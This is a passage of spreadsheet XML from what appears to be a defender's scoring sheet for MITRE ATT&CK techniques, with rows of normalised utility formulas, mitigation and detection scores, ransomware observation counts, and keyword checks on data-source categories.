      <c r="U488" s="57">
        <v>7</v>
      </c>
      <c r="V488" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.37142876190476193</v>
      </c>
      <c r="W488" s="37">
        <v>13</v>
      </c>
      <c r="X488" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y488" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z488" s="37">
        <v>52</v>
      </c>
      <c r="AA488" s="37">
        <v>0.52</v>
      </c>
      <c r="AB488" s="37">
        <v>0.52</v>
      </c>
      <c r="AC488" s="37"/>
      <c r="AD488" s="50" t="s">
        <v>1700</v>
      </c>
      <c r="AE488" s="37" t="str" cm="1">
        <f t="array" ref="AE488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD488)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF488" s="37">
        <v>484</v>
      </c>
      <c r="AG488" s="37" t="str" cm="1">
        <f t="array" ref="AG488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH488" s="37">
        <v>484</v>
      </c>
      <c r="AI488" s="37" t="str" cm="1">
        <f t="array" ref="AI488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD488)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ488" s="37">
        <v>484</v>
      </c>
      <c r="AK488" s="37" t="str" cm="1">
        <f t="array" ref="AK488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL488" s="37">
        <v>484</v>
      </c>
      <c r="AM488" s="37" t="str" cm="1">
        <f t="array" ref="AM488">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD488)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN488" s="37">
        <v>0</v>
      </c>
      <c r="AO488" s="37">
        <v>0</v>
      </c>
      <c r="AP488" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ488" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>304.38583726984126</v>
      </c>
      <c r="AR488" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS488" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT488" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU48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89" spans="1:47" ht="51">
      <c r="A489" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="B489" s="37">
        <f t="shared" si="7"/>
        <v>619.27105885714275</v>
      </c>
      <c r="C489" s="37" t="s">
        <v>1701</v>
      </c>
      <c r="D489" s="50" t="s">
        <v>1694</v>
      </c>
      <c r="E489" s="37" t="s">
        <v>1702</v>
      </c>
      <c r="F489" s="37">
        <v>1</v>
      </c>
      <c r="G489" s="37">
        <v>1</v>
      </c>
      <c r="H489" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I489" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J489" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K489" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L489" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M489" s="37">
        <v>0</v>
      </c>
      <c r="N489" s="56">
        <v>3</v>
      </c>
      <c r="O489" s="56">
        <v>2</v>
      </c>
      <c r="P489" s="56">
        <v>1</v>
      </c>
      <c r="Q489" s="56">
        <v>0</v>
      </c>
      <c r="R489" s="57" t="s">
        <v>757</v>
      </c>
      <c r="S489" s="57">
        <v>7</v>
      </c>
      <c r="T489" s="57" t="s">
        <v>1555</v>
      </c>
      <c r="U489" s="57">
        <v>13</v>
      </c>
      <c r="V489" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.21904742857142856</v>
      </c>
      <c r="W489" s="37">
        <v>20</v>
      </c>
      <c r="X489" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Y489" s="37">
        <v>0.36363600000000001</v>
      </c>
      <c r="Z489" s="37">
        <v>6</v>
      </c>
      <c r="AA489" s="37">
        <v>0.06</v>
      </c>
      <c r="AB489" s="37">
        <v>0.06</v>
      </c>
      <c r="AC489" s="37"/>
      <c r="AD489" s="50" t="s">
        <v>1703</v>
      </c>
      <c r="AE489" s="37" t="str" cm="1">
        <f t="array" ref="AE489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD489)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF489" s="37">
        <v>485</v>
      </c>
      <c r="AG489" s="37" t="str" cm="1">
        <f t="array" ref="AG489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AH489" s="37">
        <v>485</v>
      </c>
      <c r="AI489" s="37" t="str" cm="1">
        <f t="array" ref="AI489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD489)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ489" s="37">
        <v>485</v>
      </c>
      <c r="AK489" s="37" t="str" cm="1">
        <f t="array" ref="AK489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL489" s="37">
        <v>485</v>
      </c>
      <c r="AM489" s="37" t="str" cm="1">
        <f t="array" ref="AM489">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD489)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN489" s="37">
        <v>0</v>
      </c>
      <c r="AO489" s="37">
        <v>6</v>
      </c>
      <c r="AP489" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="AQ489" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>206.42368628571424</v>
      </c>
      <c r="AR489" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS489" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AT489" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.2857142857142857</v>
      </c>
      <c r="AU48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29.631955183673462</v>
      </c>
    </row>
    <row r="490" spans="1:47" ht="102">
      <c r="A490" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="B490" s="37">
        <f t="shared" si="7"/>
        <v>1398.7944488095236</v>
      </c>
      <c r="C490" s="37" t="s">
        <v>1704</v>
      </c>
      <c r="D490" s="50" t="s">
        <v>1705</v>
      </c>
      <c r="E490" s="37"/>
      <c r="F490" s="37">
        <v>8</v>
      </c>
      <c r="G490" s="37">
        <v>2</v>
      </c>
      <c r="H490" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.5</v>
      </c>
      <c r="I490" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.8</v>
      </c>
      <c r="J490" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.8</v>
      </c>
      <c r="K490" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L490" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M490" s="37">
        <v>1.27E-4</v>
      </c>
      <c r="N490" s="56">
        <v>0</v>
      </c>
      <c r="O490" s="56">
        <v>3</v>
      </c>
      <c r="P490" s="56">
        <v>1</v>
      </c>
      <c r="Q490" s="56">
        <v>0</v>
      </c>
      <c r="R490" s="57" t="s">
        <v>1706</v>
      </c>
      <c r="S490" s="57">
        <v>10</v>
      </c>
      <c r="T490" s="57" t="s">
        <v>627</v>
      </c>
      <c r="U490" s="57">
        <v>11</v>
      </c>
      <c r="V490" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.2190475238095238</v>
      </c>
      <c r="W490" s="37">
        <v>21</v>
      </c>
      <c r="X490" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Y490" s="37">
        <v>0.38181799999999999</v>
      </c>
      <c r="Z490" s="37">
        <v>4</v>
      </c>
      <c r="AA490" s="37">
        <v>0.04</v>
      </c>
      <c r="AB490" s="37">
        <v>0.04</v>
      </c>
      <c r="AC490" s="37"/>
      <c r="AD490" s="50" t="s">
        <v>1707</v>
      </c>
      <c r="AE490" s="37" t="str" cm="1">
        <f t="array" ref="AE490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD490)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AF490" s="37">
        <v>486</v>
      </c>
      <c r="AG490" s="37" t="str" cm="1">
        <f t="array" ref="AG490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD490)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH490" s="37">
        <v>486</v>
      </c>
      <c r="AI490" s="37" t="str" cm="1">
        <f t="array" ref="AI490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD490)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AJ490" s="37">
        <v>486</v>
      </c>
      <c r="AK490" s="37" t="str" cm="1">
        <f t="array" ref="AK490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL490" s="37">
        <v>486</v>
      </c>
      <c r="AM490" s="37" t="str" cm="1">
        <f t="array" ref="AM490">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD490)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN490" s="37">
        <v>0</v>
      </c>
      <c r="AO490" s="37">
        <v>2</v>
      </c>
      <c r="AP490" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.36666666666666664</v>
      </c>
      <c r="AQ490" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>466.26481626984122</v>
      </c>
      <c r="AR490" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS490" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT490" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU49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22.250705536659105</v>
      </c>
    </row>
    <row r="491" spans="1:47" ht="34">
      <c r="A491" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="B491" s="37">
        <f t="shared" si="7"/>
        <v>1087.7158322380951</v>
      </c>
      <c r="C491" s="37" t="s">
        <v>1708</v>
      </c>
      <c r="D491" s="50" t="s">
        <v>1709</v>
      </c>
      <c r="E491" s="37"/>
      <c r="F491" s="37">
        <v>1</v>
      </c>
      <c r="G491" s="37">
        <v>4</v>
      </c>
      <c r="H491" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.25</v>
      </c>
      <c r="I491" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J491" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K491" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.4</v>
      </c>
      <c r="L491" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="M491" s="37">
        <v>7.9518000000000005E-2</v>
      </c>
      <c r="N491" s="56">
        <v>0</v>
      </c>
      <c r="O491" s="56">
        <v>12</v>
      </c>
      <c r="P491" s="56">
        <v>5</v>
      </c>
      <c r="Q491" s="56">
        <v>3</v>
      </c>
      <c r="R491" s="57" t="s">
        <v>1710</v>
      </c>
      <c r="S491" s="57">
        <v>6</v>
      </c>
      <c r="T491" s="57" t="s">
        <v>135</v>
      </c>
      <c r="U491" s="57">
        <v>8</v>
      </c>
      <c r="V491" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.22857119047619048</v>
      </c>
      <c r="W491" s="37">
        <v>14</v>
      </c>
      <c r="X491" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Y491" s="37">
        <v>0.25454500000000002</v>
      </c>
      <c r="Z491" s="37">
        <v>20</v>
      </c>
      <c r="AA491" s="37">
        <v>0.2</v>
      </c>
      <c r="AB491" s="37">
        <v>0.2</v>
      </c>
      <c r="AC491" s="37"/>
      <c r="AD491" s="50" t="s">
        <v>526</v>
      </c>
      <c r="AE491" s="37" t="str" cm="1">
        <f t="array" ref="AE491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF491" s="37">
        <v>487</v>
      </c>
      <c r="AG491" s="37" t="str" cm="1">
        <f t="array" ref="AG491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD491)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH491" s="37">
        <v>487</v>
      </c>
      <c r="AI491" s="37" t="str" cm="1">
        <f t="array" ref="AI491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ491" s="37">
        <v>487</v>
      </c>
      <c r="AK491" s="37" t="str" cm="1">
        <f t="array" ref="AK491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL491" s="37">
        <v>487</v>
      </c>
      <c r="AM491" s="37" t="str" cm="1">
        <f t="array" ref="AM491">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD491)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN491" s="37">
        <v>0</v>
      </c>
      <c r="AO491" s="37">
        <v>0</v>
      </c>
      <c r="AP491" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.3</v>
      </c>
      <c r="AQ491" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>362.57194407936504</v>
      </c>
      <c r="AR491" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS491" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT491" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU49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92" spans="1:47" ht="51">
      <c r="A492" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="B492" s="37">
        <f t="shared" si="7"/>
        <v>791.90448600000002</v>
      </c>
      <c r="C492" s="37" t="s">
        <v>1711</v>
      </c>
      <c r="D492" s="50" t="s">
        <v>1712</v>
      </c>
      <c r="E492" s="37"/>
      <c r="F492" s="37">
        <v>1</v>
      </c>
      <c r="G492" s="37">
        <v>3</v>
      </c>
      <c r="H492" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I492" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J492" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K492" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L492" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M492" s="37">
        <v>7.1900000000000002E-4</v>
      </c>
      <c r="N492" s="56">
        <v>0</v>
      </c>
      <c r="O492" s="56">
        <v>4</v>
      </c>
      <c r="P492" s="56">
        <v>1</v>
      </c>
      <c r="Q492" s="56">
        <v>2</v>
      </c>
      <c r="R492" s="57" t="s">
        <v>1713</v>
      </c>
      <c r="S492" s="57">
        <v>7</v>
      </c>
      <c r="T492" s="57" t="s">
        <v>627</v>
      </c>
      <c r="U492" s="57">
        <v>11</v>
      </c>
      <c r="V492" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.20476204761904762</v>
      </c>
      <c r="W492" s="37">
        <v>18</v>
      </c>
      <c r="X492" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Y492" s="37">
        <v>0.32727299999999998</v>
      </c>
      <c r="Z492" s="37">
        <v>7</v>
      </c>
      <c r="AA492" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AB492" s="37">
        <v>7.0000000000000007E-2</v>
      </c>
      <c r="AC492" s="37"/>
      <c r="AD492" s="50" t="s">
        <v>602</v>
      </c>
      <c r="AE492" s="37" t="str" cm="1">
        <f t="array" ref="AE492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF492" s="37">
        <v>488</v>
      </c>
      <c r="AG492" s="37" t="str" cm="1">
        <f t="array" ref="AG492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AD492)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AH492" s="37">
        <v>488</v>
      </c>
      <c r="AI492" s="37" t="str" cm="1">
        <f t="array" ref="AI492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AD492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AJ492" s="37">
        <v>488</v>
      </c>
      <c r="AK492" s="37" t="str" cm="1">
        <f t="array" ref="AK492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AD492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AL492" s="37">
        <v>488</v>
      </c>
      <c r="AM492" s="37" t="str" cm="1">
        <f t="array" ref="AM492">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AD492)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AN492" s="37">
        <v>0</v>
      </c>
      <c r="AO492" s="37">
        <v>1</v>
      </c>
      <c r="AP492" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.33333333333333331</v>
      </c>
      <c r="AQ492" s="37">
        <f>(TechniqueData[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>263.96816200000001</v>
      </c>
      <c r="AR492" s="37">
        <f>IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>1</v>
      </c>
      <c r="AS492" s="37">
        <f>(TechniqueData[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AT492" s="37">
        <f>IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Count Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>4.7619047619047616E-2</v>
      </c>
      <c r="AU49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6.3087657619047617</v>
      </c>
    </row>
    <row r="493" spans="1:47" ht="17">
      <c r="A493" s="37">
        <f>parameters!$J$21*TechniqueData[[#This Row],[TAT Utility]]+parameters!$J$22*TechniqueData[[#This Row],[Count Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="B493" s="37">
        <f t="shared" si="7"/>
        <v>438.89583085714287</v>
      </c>
      <c r="C493" s="37" t="s">
        <v>1714</v>
      </c>
      <c r="D493" s="50" t="s">
        <v>1715</v>
      </c>
      <c r="E493" s="37"/>
      <c r="F493" s="37">
        <v>2</v>
      </c>
      <c r="G493" s="37">
        <v>0</v>
      </c>
      <c r="H493" s="37">
        <f>parameters!$J$10*TechniqueData[[#This Row],[Before Utility]]+parameters!$J$11*TechniqueData[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I493" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J493" s="37">
        <f>IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[Before Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K493" s="37">
        <f>(TechniqueData[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0</v>
      </c>
      <c r="L493" s="37">
        <f>IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(TechniqueData[[#This Row],[After Utility (unclipped)]]&lt;0,0, TechniqueData[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0</v>
      </c>
      <c r="M493" s="37">
        <v>4.6000000000000001E-4</v>
      </c>
      <c r="N493" s="56">
        <v>0</v>
      </c>
      <c r="O493" s="56">
        <v>0</v>
      </c>
      <c r="P493" s="56">
        <v>0</v>
      </c>
      <c r="Q493" s="56">
        <v>0</v>
      </c>
      <c r="R493" s="57" t="s">
        <v>134</v>
      </c>
      <c r="S493" s="57">
        <v>2</v>
      </c>
      <c r="T493" s="57" t="s">
        <v>1716</v>
      </c>
      <c r="U493" s="57">
        <v>11</v>
      </c>
      <c r="V493" s="37">
        <f>parameters!$J$4*TechniqueData[[#This Row],[Mitigations Utility]] + parameters!$J$5*TechniqueData[[#This Row],[Detections Utility]]</f>
        <v>0.12380971428571429</v>
      </c>
      <c r="W493" s="37">
        <v>13</v>
      </c>
      <c r="X493" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Y493" s="37">
        <v>0.23636399999999999</v>
      </c>
      <c r="Z493" s="37">
        <v>0</v>
      </c>
      <c r="AA493" s="37">
        <v>0</v>
      </c>
      <c r="AB493" s="37">
        <v>0</v>
      </c>
      <c r="AC493" s="37"/>
      <c r="AD493" s="50" t="s">
        <v>75</v>
      </c>
      <c r="AE493" s="37" t="str" cm="1">
        <f t="array" ref="AE493">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AD493)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AF493" s="37">
        <v>489</v>
      </c>
